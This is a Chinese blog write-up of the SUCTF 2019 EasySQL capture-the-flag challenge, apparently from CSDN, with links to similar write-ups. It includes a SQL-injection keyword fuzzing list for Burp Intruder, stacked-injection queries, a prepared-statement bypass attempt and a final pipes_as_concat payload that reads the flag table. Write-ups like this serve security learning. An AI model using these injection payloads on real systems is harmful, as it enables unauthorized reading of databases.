[SUCTF 2019]EasySQL1

已于 2023-11-16 21:46:33 修改
阅读量553 收藏 3
点赞数 1
分类专栏: BUUCTF web题 文章标签: 安全
于 2023-10-11 12:01:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whale_waves/article/details/133763841
版权

先用bp抓包fuzz一下看拉黑了哪些东西

ctrl+i把他放到intruder中

添加要注入的位置

设置payload

加载payload文件

这是我自用的,可能有什么不足(需要可以自取)

union select

Union sElect
union/**/select
union
select
ascii
substr
from
or
and1=1
and 1=1
updatexml
information_schema.schemata
information_schema.tables
information_schema.columns
handler
group_concat
sleep
length
()
=
#
--
%23
>
<
=
^
table_name
table_schema
column_name
information_schema.tables
information_schema.schemata
information_schema.columns
where
,
database()

综上判断尝试堆叠注入和预编译

堆叠注入

1;show tables#

出现Flag表

后续思路(想尝试select但是from被禁了不能实现)

预编译

1;sEt @sql = concat(%27se%27,%27lect * from Flag;%27);prEpare stmt from @sql;execute stmt#

似乎不行过滤了prepare,试了下大小写绕过也不行,看来正则匹配大小写

后续取参考大佬wp才明白

pipes_as_concat

补充系统变量@@sql_modesql_mode:是一组mysql支持的基本语法及校验规则
PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似

1;set sql_mode=pipes_as_concat;||flag from Flag

!!以下是我的理解

slect 1 后设置mysql的系统变量sql_mode=pipes_as_concat,最后因为设置了系统变量然后“||”将视为字符串连接符号而不是或非运算符,所以最后大概是这样的select 1(id) 和flag from Flag(来自Flag表的flag字段)

最后payload:1;set sql_mode=pipes_as_concat;select 1(因为本就在Flag表里select 1然后设置系统变量将后面的select 1插入前面的)

怪兽不会rap_哥哥我会crash
关注
专栏目录
BUUCTF [SUCTF 2019]EasySQL
qq_42158602的博客
01-10 7566
打开界面 试了一下有三种显示 还有一个没有输出 可以堆叠注入 1;show databases; 1;show tables; 可以看到有一个Flag表 测试发现from flag都被过滤不能直接读到flag 想了很久想不到 看别人wp了~ 看见听说比赛的时候原理泄漏了的 select $_GET['query'] || flag from flag 是这样 md 谁想的到啊 别...
BUU的SUCTF 2019 Easysql
小白渣的博客
02-05 3552
呜呜呜~~ ~自己已经好久好久都没有做题和更新博客辽 加上这次的疫情,感jio整个人都要躺发霉辽!!! 下午闲着没事终于开始了做题 打开题目发现是这样的一个页面 第一步还是老样子 先看看源码是什么样子的 应该是发现不了什么东西 我们发现是post 方法传参 我们可以发现 1;show databases; #查库 1;show tables; #查表 可以发现只有一个Flag...
web:[SUCTF 2019]EasySQL
sleepywin的博客
09-25 1179
将”||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似.SELECT * 和 SELECT 所有列,两者差别几乎可忽略。所以查询所有字段(或者大多数字段)的时候,可以用select *来操作。|| 逻辑或的短路:a||b计算机发现a是真,那么输出a;如果a是假,那么输出bselect 1 from :建立一个临时列,这个列的所有初始值都被设为1。Mysql中的||0 || 1 = 13 || 4 = 10 || 0 = 0。
[SUCTF 2019]EasySQL 1
qq_44761422的博客
09-05 291
虽然这个注入姿势很牛逼,但实际遇到很少,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。分隔,成堆的执行sql语句,例如。
[SUCTF 2019]EasySQL 1 Writeup(超级详细)
热门推荐
StevenOnesir的博客
11-26 1万+
本文章是该系列的第三篇,同样涉及到基础sql注入原理。 首先我们能看到的就是一个输入框,直接告诉了你注入点。 做了一些简单的测试,直接过滤了from、union、extractvalue、PREPARE等关键字,回显提示:NONONO! 前面的那道sql我还是讲的比较中规中矩,这道sql骚一点。 先讲讲我的第一种玩法: 首先手工盲注嘛,会发现连sleep等都全部过滤掉了,而且你输入数字的时候回显是: Array ( [0] => 1 ) 输入字符的时候啥也不回显。 有经验的师傅这个时候其实就懂得要放
[SUCTF 2019]EasySQL
weixin_45577185的博客
04-23 169
GitHub上有源码(https://github.com/team-su/SUCTF-2019/tree/master/Web/easy_sql) index.php源码 <?php session_start(); include_once "config.php"; $post = array(); $get = array(); global $MysqlLink; //GetPara(); $MysqlLi
buuctf-web-[SUCTF 2019]EasySQL 1-wp
居上
06-22 1048
[SUCTF 2019]EasySQL 源码 网上找的源码 <?php session_start(); include_once "config.php"; $post = array(); $get = array(); global $MysqlLink; //GetPara(); $MysqlLink = mysqli_connect("localhost",$datauser,$datapass); if(!$MysqlL
怎么解web里的SUCTF 2019easysql
最新发布
09-23
SUCTF 2019 EasySQL是一个网络安全竞赛中的Web渗透挑战题目,通常涉及SQL注入攻击和数据库管理知识。要解决这类题,你可以按照以下步骤进行: 1. **识别漏洞**:首先,尝试输入一些SQL关键字或简单查询结构来检查...
suctf 2019 easysql怎么解
03-28
题目链接:http://easysql.suctf2019.cn:8888/ 题解 进入网站后,可以看到一个登录页面,尝试使用常见的一些弱口令进行登录,发现均不可行。故考虑其他方式进入系统。 点击右上角的注册按钮,可以看到注册页面。...
[SUCTF 2019]EasySQL1 题目分析与详解
2302_79800344的博客
02-24 3438
EasySQL
BUUCTF-[SUCTF 2019]EasySQL1
Monica的博客
09-09 2943
题目: 分析: 先尝试输入。 输入非0数字的时候会有一个回显 输入大小写字母的时候没有回显 判断是什么闭合:输入1#能输出,而输入 1' 和1'#没有输出,"被过滤掉,大致上可以按照数字型进行猜测。 输入特殊字符也没有报错回显,所以报错注入基本上没戏了 输入很多关于sql语句的东西(and,or,union,if,order from )都会显示Nonono,所以联合查询也没戏 再尝试时间盲注 ,sleep也被ban了,时间盲注也不行 再尝...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怪兽不会rap_哥哥我会crash

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值